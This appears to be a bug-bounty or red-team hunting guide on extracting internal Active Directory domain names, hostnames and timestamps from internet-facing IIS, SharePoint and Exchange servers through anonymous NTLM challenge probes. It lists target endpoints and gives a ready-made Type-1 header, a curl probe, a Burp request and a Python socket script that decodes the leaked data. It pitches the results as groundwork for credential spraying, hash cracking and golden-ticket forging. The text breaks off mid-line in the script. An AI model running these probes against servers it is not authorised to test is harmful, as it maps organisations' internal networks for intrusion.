hunt-ntlm-info

Crown Jewel Targets

NTLM info disclosure is a Medium-severity finding when chained to context — the leak itself is intentional protocol behavior (RFC-compliant NTLMSSP challenge), but on internet-exposed enterprise infrastructure it provides exact reconnaissance for the next stage of an attack. Highest-value targets:

• Internet-reachable IIS / SharePoint / Exchange / OWA with dual-auth (Forms + NTLM, or NTLM + Kerberos)
• Citrix NetScaler / VMware Horizon View internet-facing gateways with NTLM-backed AD auth
• Lync / Skype for Business / Teams On-Prem edge servers
• WSUS / Windows Update Services with NTLM-protected admin paths
• CIFS-style fileshare proxies (HCL Sametime, IBM Notes Domino) that proxy NTLM
• Legacy SharePoint farms that left NTLM enabled on the public-zone IIS binding

What makes this pay:

• Internal AD domain disclosure (parent-forest mapping, e.g. customer.parent-corp.example → tenant inside corporate-AD tree)
• Default-Windows-hostname disclosure (WIN-XXXXXXXXXXX pattern signals rushed provisioning → likely default service-account passwords)
• Timestamp leak (used in NTLMv2 hash cracking acceleration)
• Direct attack-map enrichment for credential spraying combined with hunt-auth-bypass Legacy-Protocol Matrix

Attack Surface Signals

Response headers signaling NTLM availability:

WWW-Authenticate: NTLM
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM, Negotiate
WWW-Authenticate: Negotiate, NTLM

URL patterns where NTLM is commonly exposed:

/_api/web/CurrentUser                  (SharePoint REST)
/_vti_bin/*.asmx                       (SharePoint legacy SOAP)
/EWS/Exchange.asmx                     (Exchange Web Services)
/Autodiscover/Autodiscover.xml         (Exchange autodiscover)
/owa/                                  (Outlook Web App)
/Microsoft-Server-ActiveSync           (ActiveSync)
/PowerShell                            (Exchange Mgmt Shell over HTTPS)
/api/v3/                               (TeamCity, Atlassian)
/wsus/                                 (Windows Server Update Services)
/manager/html                          (some Tomcat behind IIS)
/iisstart.htm                          (default IIS, sometimes reveals NTLM upstream)

Tech-stack signals:

• IIS on the public internet (almost always NTLM-capable, even if Forms is the front)
• SharePoint Web Front End (almost always dual-auth Forms + NTLM)
• Exchange edge transport
• Server header Microsoft-HTTPAPI/2.0, Microsoft-IIS/*, IIS/*

Step-by-Step Hunting Methodology

1. Probe every anonymous endpoint for WWW-Authenticate: NTLM. Send a vanilla GET and inspect response headers. If NTLM is offered, proceed.

2. Send a valid NTLMSSP Type-1 message anonymously. The Type-1 base64 below requests NetBIOS-domain and Workstation info from the server:

   Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==
   

   This is the standard test Type-1 with negotiate flags NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_OEM | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_KEY_EXCH | NTLMSSP_NEGOTIATE_56 | NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_TARGET_INFO. The OS Version field (06 01 B1 1D 00 00 00 0F) is Windows 7 build 7601 — accepted by virtually every NTLM responder.

3. Use a keep-alive raw socket, not Python requests / curl one-shot. Most HTTP libraries close the connection between the Type-1 send and Type-2 reception. Use one of:

   • Burp Repeater with Connection: keep-alive set explicitly
   • Burp mcp__burp__send_http1_request (handles keep-alive natively)
   • Python raw socket + ssl.wrap_socket (see Payload section)

4. Parse the Type-2 challenge from the WWW-Authenticate: NTLM <base64> response header. Base64-decode the value. The structure is NTLMSSP per MS-NLMP:

   • Bytes 0-7: literal NTLMSSP\0
   • Bytes 8-11: MessageType = \x02\x00\x00\x00
   • Bytes 12-19: TargetName SecurityBuffer (len, alloc, offset)
   • Bytes 20-23: NegotiateFlags
   • Bytes 24-31: Server Challenge (8 bytes — useful for offline cracking)
   • Bytes 40-47: TargetInfo SecurityBuffer (len, alloc, offset)
   • TargetInfo body: AV_PAIRS array of (AvId u16, AvLen u16, Value)

5. Decode the AV_PAIRS. The AvIds you care about:

   • 1 = NetBIOS Computer Name
   • 2 = NetBIOS Domain Name
   • 3 = DNS Computer Name (FQDN of the responding server)
   • 4 = DNS Domain Name (the AD domain)
   • 5 = DNS Tree Name (the AD forest root)
   • 7 = Timestamp (FILETIME, useful for NTLMv2 hash relay / cracking)
   • 9 = Target Name (in newer NTLMSSP)

6. Map findings to severity tier:

   • Internet-exposed + default WIN-XXXXXXXXXXX hostname + corporate-AD-tree disclosure → Medium
   • Internet-exposed + named-server hostname (SPWEB01.corp.example) + corporate-AD-tree → Low-Medium
   • Intranet-only + any disclosure → Informational
   • Combine with hunt-auth-bypass Legacy-Protocol Matrix findings on the same host → upgrade the auth-bypass finding's severity since the attacker has UPN/SAM format ready

7. Check the timestamp. If AV[7] returns a current FILETIME within ~5s of Date: header, the system clock is synced — useful intel for Kerberos golden-ticket forging (out of bug-bounty scope but red-team relevant).

8. Cross-reference with subdomain enum. The DNS Tree name often reveals the parent forest — e.g. customer.parent-corp.example reveals the customer is a sub-domain INSIDE corporate-parent AD, not a separate tenant. This is a privacy / topology-disclosure escalation that programs sometimes accept as Medium.

Payload & Detection Patterns

Generic NTLM Type-1 anonymous probe (curl + raw socket fallback):

# Most one-shot curl runs DON'T return Type-2 because the connection closes.
# Use this as a quick probe to confirm NTLM is offered:
curl -sk -I -H "Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==" \
  "https://target.example/_api/web/CurrentUser" 2>&1 | grep -i "WWW-Authenticate"

Burp send_http1_request (recommended for full Type-2 capture):

GET /_api/web/CurrentUser HTTP/1.1
Host: target.example
Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==
Connection: keep-alive
User-Agent: Mozilla/5.0

Python raw socket + AV_PAIR decoder:

import socket, ssl, base64, struct, re
from datetime import datetime, timezone

HOST = "target.example"
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

s = ctx.wrap_socket(socket.create_connection((HOST, 443)), server_hostname=HOST)
s.sendall(
    f"GET /_api/web/CurrentUser HTTP/1.1\r\n"
    f"Host: {HOST}\r\n"
    "Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n".encode()
)
data = b""
while True:
    chunk = s.recv(8192)
    if not chunk: break
    data += chunk
    if b"\r\n\r\n" in data: break

m = re.search(rb"WWW-Authenticate:\s*NTLM\s+([A-Za-z0-9+/=]{20,})", data, re.I)
if m:
    b = base64.b64decode(m.group(1).decode("ascii"))
    assert b[:8] == b"NTLMSSP\x00"
    tn_len, _, tn_off = struct.unpack_from('<HHI', b, 12)
    ti_len, _, ti_off = struct.unpack_from('<HHI', b, 40)
    print(f"TargetName: {b[tn_off:tn_off+tn_len].decode('utf-16-le', errors='ignore')!r}")
    av_types = {1:'NetBIOS Computer Name', 2:'NetBIOS Domain Name',
                3:'DNS Computer Name', 4:'DNS Domain Name',
                5:'DNS Tree Name', 7:'Timestamp', 9:'Target Name'}
    i = 0
    ti = b[ti_off:ti_off+ti_len]
    while i < len(ti):
        av_id, av_len = struct.unpack_from('<HH', ti, i)
        if av_id == 0: break
        val = ti[i+4:i+4+av_len]
        if av_id == 7:
            ts = struct.unpack('<Q', val[:8])[0]
            secs = (ts - 116444736000000000) / 10000000
            vs = da